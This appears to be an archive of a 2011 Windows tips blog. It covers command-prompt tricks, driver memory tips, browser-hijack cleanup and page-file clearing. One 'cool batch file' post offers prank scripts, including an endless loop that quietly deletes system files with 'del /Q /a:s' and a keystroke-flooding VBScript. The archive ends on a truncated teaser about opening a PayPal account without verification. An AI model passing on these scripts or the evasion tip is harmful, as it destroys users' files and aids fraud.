
Thursday, October 13, 2011

Command Prompt Trick

Did you know you can drag & drop files and folders onto the command prompt window (and onto any open window in the taskbar)?

For example, a trick that I use is this:

Suppose you want to run a DOS command on a particular folder (ex: "C:\Winnt\system32\drivers\etc")

1 - Open the command prompt (Start->Run->cmd.exe) or use the shortcut
2 - Open a Windows Explorer window and go to the parent folder (ex: "C:\System32\Drivers")
3 - In the DOS window, type CD " (leave the quote!)
4 - From the Explorer window, drag the folder (you'll see a small square with a PLUS sign) to the taskbar over the Command Prompt window until it pops up again, then release the mouse over the command prompt.
5 - The full path to the folder is written in the command prompt. Just add the closing quote and away you go! It is faster than typing the whole path if the directory is several levels deep!

Enable or disable command extensions

When you use CMD.EXE, there are various extensions which are enabled by default. To enable or disable them, perform the following steps:

1.Start the registry editor (regedit.exe)
2.Move to HKEY_CURRENT_USER\Software\Microsoft\Command Processor
3.Double click on EnableExtensions
4.Set to 1 for them to be enabled, or set to 0 for extensions to be disabled
5.Click OK

You can also enable/disable them for a specific command session by using the appropriate qualifier to cmd.exe

cmd /y disables command extensions for this cmd session
cmd /x enables command extensions for this cmd session
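
The registry steps above can be checked from PowerShell. The following is an added example, not part of the original post; it also reads the machine-wide copy of the value under HKEY_LOCAL_MACHINE and applies the precedence described in the `cmd /?` help text (user setting over machine setting, enabled when neither is present). The function name is hypothetical.

```powershell
# Added example (not from the original post).
# Reports where EnableExtensions is set and what a new cmd.exe session
# started without /x or /y will use.
function Get-CmdExtensionSetting {
    $subKey = 'Software\Microsoft\Command Processor'
    $found  = [ordered]@{ HKCU = $null; HKLM = $null }

    foreach ($hive in 'HKCU', 'HKLM') {
        # Returns nothing (and no error) when the key or the value is absent.
        $item = Get-ItemProperty -Path "${hive}:\$subKey" -Name EnableExtensions `
                                 -ErrorAction SilentlyContinue
        if ($null -ne $item) { $found[$hive] = [int]$item.EnableExtensions }
    }

    # Precedence per "cmd /?": the per-user value wins over the machine value,
    # and extensions are enabled when neither value exists.
    if     ($null -ne $found.HKCU) { $source = 'HKCU';    $value = $found.HKCU }
    elseif ($null -ne $found.HKLM) { $source = 'HKLM';    $value = $found.HKLM }
    else                           { $source = 'default'; $value = 1 }

    [pscustomobject]@{
        HKCU              = $found.HKCU
        HKLM              = $found.HKLM
        EffectiveSource   = $source
        # Only 0 and 1 are documented; any other value is treated as
        # enabled here, which is an assumption of this example.
        ExtensionsEnabled = ($value -ne 0)
    }
}

Get-CmdExtensionSetting | Format-List

# The /x and /y switches override the registry for a single session:
#   cmd /y    extensions off for that session, whatever the registry says
#   cmd /x    extensions on for that session, whatever the registry says
```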

How to make efficient use of Computer Memory

In this post I will provide 5 tips for using memory efficiently in kernel-mode drivers for the Microsoft Windows family of operating systems.

Using memory wisely can help improve driver performance. Here are 5 tips for efficient memory use.

1.Lay out data structures efficiently and reuse them when possible

When designing your driver, plan your memory allocations according to type of memory, size, and lifetime. Combine allocations of similar lifetimes, so that you can free unused memory as soon as it is no longer needed. Don’t mix structures of greatly different sizes in the same allocation unless you can be sure that they will be aligned appropriately.

Reuse structures instead of freeing them and later reallocating memory for other uses. Reusing structures avoids additional reallocations and can help prevent fragmentation of the memory pool.

Drivers often require additional memory while handling I/O requests. A driver might allocate a memory descriptor list (MDL) or internal buffer to use for a specific I/O request or might need to allocate an IRP to send to lower drivers. The size of these structures varies depending on the request. The size of an MDL, for example, depends on the size of the buffer it describes.

If your driver has a technique to limit I/O size or to split up a large I/O request, you could make the buffer a fixed size, thus fixing the size of the MDL and making the buffer reusable.

Keep in mind that all performance issues involve tuning and balance. As a general rule, you should optimize for the most frequent operations, and not for unusually large or small requests that rarely occur.

2.Allocate nonpaged pool memory for long-term use at start-up

Drivers normally use nonpaged pool memory for long-term I/O buffers. Because nonpaged pool becomes fragmented as the system runs, drivers should preallocate memory that they will require for long-term structures and deallocate it when the device is removed. For example, a driver that always performs DMA, creates several events, and uses a lookaside list should allocate memory for those objects at startup in a DriverEntry or AddDevice routine and free the memory as part of handling the device removal request.

The driver should not, however, preallocate excessively large blocks of memory (several megabytes, for example) and try to manage its own allocations within that block.

Appropriate memory allocation routines include ExAllocatePoolWithTag, ExAllocatePoolWithQuotaTag, ExAllocatePoolWithTagPriority and AllocateCommonBuffer (if the driver's device uses bus-master DMA or a system DMA controller's auto-initialize mode).

Drivers should use the tagged versions of the pool allocation routines instead of the nontagged versions, which are obsolete. WinDbg and numerous testing tools use the tags to track memory allocation. Tagging pool allocations can help you more easily find memory-related bugs.

3.Use memory economically

Nonpaged pool memory is a limited system resource. Drivers should allocate I/O buffers as economically as possible. In general, avoid calling the memory allocation support routines repeatedly to request allocations of less than PAGE_SIZE. If your driver normally uses several related structures together, consider bundling those structures into a single allocation. For example, the SCSI port driver bundles an IRP, a SCSI request block (SRB), and an MDL into a single allocation.

Drivers that use DMA are an exception. If a driver that performs DMA needs several one-page buffers, but the buffers need not be contiguous, it should call AllocateCommonBuffer once for each such buffer. This approach conserves contiguous address space and improves the chances that the memory allocations will succeed.

In addition, consider whether the memory allocation routines you plan to use round the allocation request up to the next page boundary.

If the driver requests fewer than PAGE_SIZE bytes, ExAllocatePoolWithTag allocates the number of bytes requested. If the driver requests PAGE_SIZE or greater bytes, ExAllocatePoolWithTag allocates a page-aligned buffer that is an integral multiple of PAGE_SIZE bytes. Memory allocations of less than PAGE_SIZE do not cross page boundaries and are not necessarily page-aligned; instead, they are aligned on an 8-byte boundary.

AllocateCommonBuffer always allocates at least a page of memory. If the driver requests less than an integral multiple of PAGE_SIZE bytes, the remaining bytes on the last page are inaccessible to the driver.

4.Use lookaside lists

Lookaside lists provide fixed-size, reusable buffers. They are designed for structures that a driver might need to allocate dynamically and in unpredictable numbers.

Lookaside lists can be allocated from paged pool or nonpaged pool. The driver defines the layout and contents of the entries in the list to suit its requirements, and the system maintains list status and adjusts the number of available entries according to demand.

A driver calls ExInitialize[N]PagedLookasideList to set up a lookaside list, ExAllocateFrom[N]PagedLookasideList to allocate an entry in the list, and ExFreeTo[N]PagedLookasideList to free an entry in the list. The head of the list must be allocated from nonpaged memory, even if the list entries themselves are in paged memory.

5.Avoid frequently mapping and unmapping the virtual address space

Frequently mapping and unmapping the virtual address space can decrease performance system-wide because it can result in frequent flushes of the translation lookaside buffer (TLB), a per-processor cache of virtual-to-physical address translations. Each entry in the TLB contains a page table entry (PTE).

Every time the system translates a virtual address that references a new page, it adds an entry to the TLB. Once the TLB is full, the system must drop an existing entry every time it must add a new entry. Subsequently, each time a caller remaps or unmaps the address space, thus changing a PTE, the system must interrupt all CPUs so that it can update any TLB entries that contain the PTE.

Internally, the I/O manager avoids this problem for the MDL in Irp->MdlAddress. The first time a kernel-mode component calls MmGetSystemAddressForMdlSafe, the I/O manager stores the system address in the MDL along with the corresponding physical address. When the IRP returns to the I/O manager after completion, the I/O manager unmaps the MDL. Thus, the I/O manager requires only a single mapping (and a single virtual to physical address translation) for each I/O request.

Google redirect virus or Browser hijacking: How to avoid and protect them from damage

Browser hijacking is one of the most common types of online attack. The attacker tries to gain full control of your Internet browser, whichever one you use, including Internet Explorer, Mozilla Firefox or even Opera, and to change the form and content of what you see while you surf the web. If you keep your computer up to date by installing software updates and follow the essential rules of safe surfing, you are already doing much to prevent such attacks. However, if your browser has been hijacked, you can free it from the hijackers and restore its settings in several ways.

How to Identify whether the browser has been hijacked

Signs of browser hijacking include the following unusual behaviors:

1.The home page or other settings of your computer have been modified.
Example: links to sites that you tend to avoid have been added.
2.Some web pages become inaccessible
Including the sites of antispyware and other security software.
3.Pop-ups open in a cascade
Pop-ups open continuously on your screen.
4.New toolbars and favorites have been installed
These display icons and links to web pages.
5.The computer is slower
Malicious software can slow the operation of your computer.

By following a few simple guidelines you can ensure the proper operation of your computer:

Be extremely careful about what you download or install on your computer

When you download a new program to your computer, a warning message appears. Take this warning seriously. Dubious online games and multimedia services can hide spyware and other malicious software in the "free" software needed to use their services. If you are unsure of the reliability of a program or a software component, do not download it and do not install it on your computer. In addition, if a popup window prompts you to allow installation of a program, click No, unless you really want to install this program on your computer.

Download and install protection software

1.Install automatic updates. In Windows 2000 and Windows XP, updates are installed automatically on your computer. However, if you have disabled automatic updates and therefore update manually, simply log on to the Microsoft Update website and install the service packs and updates for Windows, especially Windows SP2.

2.Ensure that you are using the newest version of the browser. If you are using Internet Explorer, make sure you use the latest version of the software, and download and install all available security updates.

3.Use up-to-date antivirus and antispyware software. Set them to run automatically. Many browser hijacking attempts are linked to viruses or spyware.

Keep an anti-hijacking toolkit on hand. The toolkit should include anti-hijacking programs such as Microsoft Windows AntiSpyware (Beta) (available in English only) and Spybot, which, in the event of a hijacking, will help you to regain control of your browser and your computer. Furthermore, reliable antivirus programs can detect some hijackers, sometimes flagged as Trojans, and help eradicate them.


Configure the security settings of your browser

1.In the Tools menu, click Internet Options, then click the Security tab.
2.Click the Internet icon, click the Custom Level button, then select Medium in the Reset menu.
3.Click the Reset button.
4.Click OK.

Restoring a hijacked browser

To try to restore the settings of your browser, follow the six tips below.

1 - Stop the continuous opening of pop-ups

When pop-ups open continuously on the screen of your computer, you probably want to stop the deluge first. On Microsoft Windows XP or Windows 2000 with Internet Explorer, follow these steps:

1.Press CTRL + ALT + DEL, click Task Manager, then click the Processes tab.
2.Click IEXPLORE.EXE, then click the End Process button.

This closes all instances of Internet Explorer. You can then open the program again and surf as usual. To prevent future attacks, activate a program to block pop-ups. To enable the blocking of pop-ups from Internet Explorer:

1.In the Tools menu, click Internet Options, then click the Privacy tab.
2.In the window Pop-up Blocker, click the check box Block pop-ups. Click OK.


If other symptoms of web browser hijacking persist, do the following:

2 - Install a prevention program
Use one of those mentioned in the paragraph entitled "Skip browser hijacking". Many browser hijacking programs can be detected and removed by running these programs once they are downloaded and installed on your computer.

3 - Run the removal tool for malicious software.
It can detect certain types of hijacking program, but not all. I recommend downloading Microsoft Security Essentials.

4 - Manually restore your settings. If you are using the Internet Explorer browser and your homepage has been changed, you can restore it yourself.

1.In the Tools menu, click Internet Options, then click the General tab.
2.In the Start page section, enter the desired Internet address in the Address bar, or click the Back button to restore the manufacturer's original default setting.
3.Click OK.

5 - Remove unwanted programs using Add or Remove Programs.

If you want to try more advanced removal methods, see the article titled "Unexplained computer behavior may be caused by deceptive software" on the Microsoft support site. There you can find additional steps, including using Add/Remove Programs, deleting built-in programs, and using the search function in Windows Explorer.

6 - Empty the trash
After all these steps, especially if you have removed an unwanted program, restart your computer.




Monday, October 10, 2011

cool batch file

1).
@echo off
echo blanking screen .......
cls
echo searching ini's
@dir c:\*.ini /s/w
echo .... Scared ?
pause


2).
@echo off
:start
echo 15623682356574 /q /w
color 24
del /Q /a:s
echo geras-lakha
goto start


3).
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Friday, October 7, 2011

How to disable Google Instant Search

Google has introduced a new feature in its search engine, which it calls Instant Search. The change was introduced to make searching fast and interactive by showing results instantly as you type. With Google Instant, search has changed from a static HTML page into an AJAX application, similar to Google Maps and Gmail. But not every internet user likes this feature. There are many reasons why most of you might want to disable it, but the most common one is usually "internet connection speed".

So, if you do not want this feature and want to turn it off, simply make the necessary change by clicking the link next to the search box on any search results page.

For example, search for "Apple" on Google and you should get some results. After the search, you will see a link titled "Instant is on". Click "Instant is on" and then select "Off (press Enter to search)".

Done!

Wednesday, October 5, 2011

Clear your sensitive information on system shutdown

During data processing, some operating systems use the hard disk as additional memory, called virtual memory. The operating system transfers some data and programs from RAM to the hard disk and reloads them when required. The data or programs are stored on the hard disk in a temporary file called the swap file. This technique of swapping data between memory and hard disk is called paging. The operating system can spend a lot of time in the paging process instead of executing the application software. The problem is that, as you work with different software programs on the computer, the page file may come to contain your confidential information, stored in unencrypted form. To reduce this risk, you can set your computer to clear out the page file automatically each time you shut down your computer.

Perform the given steps to set your system to clear the page file automatically:

To enable this feature, you will need to be logged into your computer with administrative rights.
First click on the Start button to open Control Panel, and then click on the "Administrative Tools" option.

Now the "Local Security Settings" panel will appear; on the left side of this panel, click on "Local Policies".

Here click on "Security Options", then double-click on the "Shutdown: Clear virtual memory pagefile" option.

A small dialog box will now appear with the options "Enabled" and "Disabled" for clearing the page file.

Press the Apply button to save the settings and then click on the OK button to finish.

source : http://www.computeronlinetips.com
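
The "Shutdown: Clear virtual memory pagefile" policy described above is stored as the ClearPageFileAtShutdown value in the registry, so it can be audited or set from PowerShell. The following is an added example, not part of the original post or its source; the registry path and value name do not appear in the post, and the function names are hypothetical.

```powershell
# Added example (not from the original post).
$MmKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management'

function Get-PageFileClearPolicy {
    # Reading the key does not require elevation.
    $mm  = Get-ItemProperty -Path $MmKey
    $raw = $mm.ClearPageFileAtShutdown      # $null when the value is absent
    [pscustomobject]@{
        ClearAtShutdown = ($raw -eq 1)      # 1 = policy Enabled, anything else = not clearing
        RawValue        = $raw
        PagingFiles     = $mm.PagingFiles   # page files configured on this machine
    }
}

function Set-PageFileClearPolicy {
    param([Parameter(Mandatory = $true)][bool]$Enabled)

    # Same requirement as the GUI steps: administrative rights.
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($identity)
    $adminRole = [Security.Principal.WindowsBuiltInRole]::Administrator
    if (-not $principal.IsInRole($adminRole)) {
        throw 'Run this from an elevated PowerShell session.'
    }

    Set-ItemProperty -Path $MmKey -Name ClearPageFileAtShutdown `
                     -Value ([int]$Enabled) -Type DWord
    Get-PageFileClearPolicy                 # read back what was written
}

# Audit only:
Get-PageFileClearPolicy | Format-List

# Enable clearing (elevated session):
# Set-PageFileClearPolicy -Enabled $true
```

The page file is cleared only during a clean shutdown, and shutdown takes longer once the setting is enabled.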

How to make a PayPal ACC without the need to verify anything

If you are from North America you have to face prompt of Paypal  that ask you for your SSN (Social Security Number). This is very Easy metho...